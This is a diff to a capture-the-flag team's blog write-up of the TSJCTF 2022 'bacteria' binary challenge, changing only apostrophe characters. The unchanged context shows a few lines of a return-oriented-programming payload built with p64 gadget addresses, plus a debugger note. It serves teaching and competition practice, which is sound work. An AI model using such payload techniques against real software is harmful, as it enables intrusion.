project-sekai-ctf/sekai.team/data/blog/tsjctf-2022/bacteria.md

 payload = p64(rw_section)
 payload += p64(mov_rsi_rbp_read)
-payload += p64(0)*2                 # Just for padding so that we don't need to sleep() p.send(payload)
+payload += p64(0)*2                 # Just for padding so that we don’t need to sleep() p.send(payload)
 ```

-Running script and we stop at ret, we can see that it's ready for the next input of 0x20 bytes to the rw_section (by looking at rbp)
+Running script and we stop at ret, we can see that it’s ready for the next input of 0x20 bytes to the rw_section (by looking at rbp)

 Status of rbp:
 ![rw_section_rbp.png](/static/images/tsjctf-2022/bacteria/rw_section_rbp.png)